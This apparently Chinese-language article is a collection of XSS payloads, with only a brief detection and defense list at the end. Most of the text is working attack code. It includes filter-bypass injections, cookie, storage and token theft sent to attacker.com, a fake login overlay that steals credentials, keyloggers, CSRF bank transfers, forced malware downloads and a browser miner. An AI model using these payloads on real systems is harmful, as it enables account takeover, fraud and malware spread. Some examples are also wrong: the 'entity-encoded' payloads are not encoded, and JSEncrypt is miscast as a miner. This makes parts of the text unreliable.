答案
XSS Payload(攻击载荷)是攻击者用于执行 XSS 攻击的恶意代码片段。了解常见的 XSS Payload 对于检测和防护 XSS 攻击至关重要。XSS Payload 可以分为多种类型,每种类型都有其特定的攻击场景和绕过技巧。
基础 XSS Payload
1. Script 标签注入
最基础的 Payload:
<script>alert(1)</script> <script>alert('XSS')</script> <script>alert("XSS")</script>
变体:
<script>alert(String.fromCharCode(88,83,83))</script> <script>alert(/XSS/.source)</script> <script>alert`XSS`</script>
2. 图片标签注入
onerror 事件:
<img src=x onerror=alert(1)> <img src=x onerror=alert('XSS')> <img src=x onerror=alert("XSS")>
变体:
<img src=x onerror=alert(1)> <img src=x onerror=alert(1) /> <img src=x onerror=alert(1)//>
3. SVG 标签注入
onload 事件:
<svg onload=alert(1)> <svg/onload=alert(1)> <svg onload="alert(1)">
变体:
<svg onload="alert(1)"> <svg onload='alert(1)'> <svg onload=alert(1)>
高级 XSS Payload
1. 事件处理器注入
常见事件:
<body onload=alert(1)> <body onpageshow=alert(1)> <body onfocus=alert(1)> <body onblur=alert(1)> <input onfocus=alert(1) autofocus> <input onblur=alert(1) autofocus> <input onchange=alert(1) autofocus> <select onfocus=alert(1) autofocus> <select onblur=alert(1) autofocus> <select onchange=alert(1) autofocus> <textarea onfocus=alert(1) autofocus> <textarea onblur=alert(1) autofocus> <textarea onchange=alert(1) autofocus> <details open ontoggle=alert(1)> <details open onmouseover=alert(1)> <details open onclick=alert(1)>
2. iframe 注入
javascript: 协议:
<iframe src="javascript:alert(1)"></iframe> <iframe src='javascript:alert(1)'></iframe> <iframe src=javascript:alert(1)></iframe>
data: 协议:
<iframe src="data:text/html,<script>alert(1)</script>"></iframe> <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
3. form 注入
formaction 属性:
<form><button formaction=javascript:alert(1)>Click</button></form> <form><input type=submit formaction=javascript:alert(1) value=Click></form>
formtarget 属性:
<form action="javascript:alert(1)"><input type=submit value=Click></form> <form action="data:text/html,<script>alert(1)</script>"><input type=submit value=Click></form>
绕过过滤器的 Payload
1. 大小写绕过
变体:
<ScRiPt>alert(1)</ScRiPt> <SCRIPT>alert(1)</SCRIPT> <Img src=x oNeRrOr=alert(1)>
2. 编码绕过
HTML 实体编码:
<script>alert(1)</script> <script>alert(1)</script> <script>alert(1)</script>
URL 编码:
%3Cscript%3Ealert(1)%3C/script%3E %3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
JavaScript 编码:
<script>\u0061\u006c\u0065\u0072\u0074(1)</script> <script>\x61\x6c\x65\x72\x74(1)</script>
3. 注释绕过
变体:
<!--><script>alert(1)</script>--> <!----><script>alert(1)</script><!--> <!--><img src=x onerror=alert(1)>-->
4. 空格绕过
变体:
<img/src=x/onerror=alert(1)> <svg/onload=alert(1)> <script>alert(1)//>
5. 引号绕过
变体:
<script>alert(1)</script> <script>alert`1`</script> <script>alert(/1/)</script> <script>alert(String.fromCharCode(49))</script>
Cookie 窃取 Payload
1. 基础 Cookie 窃取
直接发送:
<script> const stolenCookie = document.cookie; fetch('http://attacker.com/steal?cookie=' + encodeURIComponent(stolenCookie)); </script>
使用 Image 标签:
<img src="http://attacker.com/steal?cookie=123" onerror="this.src='http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)">
2. 高级 Cookie 窃取
使用 XMLHttpRequest:
<script> const xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)); xhr.send(); </script>
使用 WebSocket:
<script> const ws = new WebSocket('ws://attacker.com/steal'); ws.onopen = function() { ws.send(document.cookie); }; </script>
会话劫持 Payload
1. 会话 ID 窃取
LocalStorage 窃取:
<script> const localStorageData = JSON.stringify(localStorage); fetch('http://attacker.com/steal?localStorage=' + encodeURIComponent(localStorageData)); </script>
SessionStorage 窃取:
<script> const sessionStorageData = JSON.stringify(sessionStorage); fetch('http://attacker.com/steal?sessionStorage=' + encodeURIComponent(sessionStorageData)); </script>
2. Token 窃取
JWT Token 窃取:
<script> const token = localStorage.getItem('token'); fetch('http://attacker.com/steal?token=' + encodeURIComponent(token)); </script>
钓鱼攻击 Payload
1. 虚假登录表单
注入虚假表单:
<script> const fakeForm = ` <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;"> <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border-radius:5px;"> <h3>会话已过期,请重新登录</h3> <input type="text" id="username" placeholder="用户名"> <input type="password" id="password" placeholder="密码"> <button onclick="stealCredentials()">登录</button> </div> </div> `; document.body.innerHTML += fakeForm; function stealCredentials() { const username = document.getElementById('username').value; const password = document.getElementById('password').value; fetch('http://attacker.com/steal', { method: 'POST', body: JSON.stringify({ username, password }) }); } </script>
2. 重定向攻击
恶意重定向:
<script> window.location = 'http://phishing.com/login?ref=' + encodeURIComponent(document.location.href); </script>
使用 meta 标签:
<meta http-equiv="refresh" content="0;url=http://phishing.com/login">
键盘记录 Payload
1. 基础键盘记录
记录所有按键:
<script> let keylog = ''; document.addEventListener('keydown', function(e) { keylog += e.key; if (keylog.length > 100) { fetch('http://attacker.com/keylog', { method: 'POST', body: JSON.stringify({ keylog }) }); keylog = ''; } }); </script>
2. 高级键盘记录
记录上下文:
<script> let keylog = []; document.addEventListener('keydown', function(e) { keylog.push({ key: e.key, timestamp: Date.now(), url: window.location.href, element: e.target.tagName }); if (keylog.length > 50) { fetch('http://attacker.com/keylog', { method: 'POST', body: JSON.stringify({ keylog }) }); keylog = []; } }); </script>
数据篡改 Payload
1. 修改页面内容
修改文本内容:
<script> document.getElementById('bank-balance').textContent = '999999.99'; document.getElementById('transaction-history').innerHTML = '<p>无交易记录</p>'; </script>
2. 修改链接
修改所有链接:
<script> const links = document.querySelectorAll('a'); links.forEach(link => { link.href = 'http://phishing.com/login?redirect=' + encodeURIComponent(link.href); }); </script>
CSRF 辅助 Payload
1. 自动发送请求
发送 GET 请求:
<script> fetch('http://bank.com/transfer?to=attacker&amount=10000', { credentials: 'include' }); </script>
发送 POST 请求:
<script> fetch('http://bank.com/transfer', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'to=attacker&amount=10000', credentials: 'include' }); </script>
2. 窃取 CSRF Token
窃取 meta 标签中的 Token:
<script> const csrfToken = document.querySelector('meta[name="csrf-token"]').content; fetch('http://attacker.com/steal?token=' + encodeURIComponent(csrfToken)); </script>
恶意软件分发 Payload
1. 下载恶意文件
自动下载:
<script> const link = document.createElement('a'); link.href = 'http://malicious.com/trojan.exe'; link.download = 'update.exe'; link.click(); </script>
2. 诱导下载
显示虚假更新提示:
<script> const updateMessage = ` <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;"> <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border-radius:5px;"> <h3>发现新版本,请点击下载更新</h3> <a href="http://malicious.com/update.exe" download>下载更新</a> </div> </div> `; document.body.innerHTML += updateMessage; </script>
网页挖矿 Payload
1. 使用 Coinhive
基础挖矿:
<script src="https://coin-hive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.User('site-key'); miner.start(); </script>
2. 使用 JSEncrypt
加密挖矿:
<script src="https://cdnjs.cloudflare.com/ajax/libs/jsencrypt/3.0.0/jsencrypt.min.js"></script> <script> var crypt = new JSEncrypt(); // 执行加密挖矿 </script>
检测和防护
1. 检测 Payload
常见检测方法:
- 搜索
<script>标签 - 搜索
javascript:协议 - 搜索
onerror、onload等事件处理器 - 搜索
eval()、new Function()等危险函数 - 使用正则表达式匹配恶意模式
2. 防护 Payload
防护措施:
- 对所有用户输入进行编码
- 使用 Content Security Policy
- 设置 HttpOnly Cookie
- 使用安全的 DOM API
- 实施输入验证和过滤
总结
XSS Payload 是攻击者执行 XSS 攻击的工具,了解常见的 XSS Payload 对于检测和防护 XSS 攻击至关重要。常见的 XSS Payload 包括:
- 基础 Payload:Script 标签、图片标签、SVG 标签
- 高级 Payload:事件处理器、iframe、form
- 绕过过滤器 Payload:大小写、编码、注释、空格、引号
- Cookie 窃取 Payload:直接发送、使用 Image 标签
- 会话劫持 Payload:LocalStorage、SessionStorage、Token 窃取
- 钓鱼攻击 Payload:虚假登录表单、重定向攻击
- 键盘记录 Payload:记录按键、记录上下文
- 数据篡改 Payload:修改页面内容、修改链接
- CSRF 辅助 Payload:自动发送请求、窃取 CSRF Token
- 恶意软件分发 Payload:下载恶意文件、诱导下载
- 网页挖矿 Payload:使用 Coinhive、JSEncrypt
通过了解这些 Payload,开发者可以更好地检测和防护 XSS 攻击。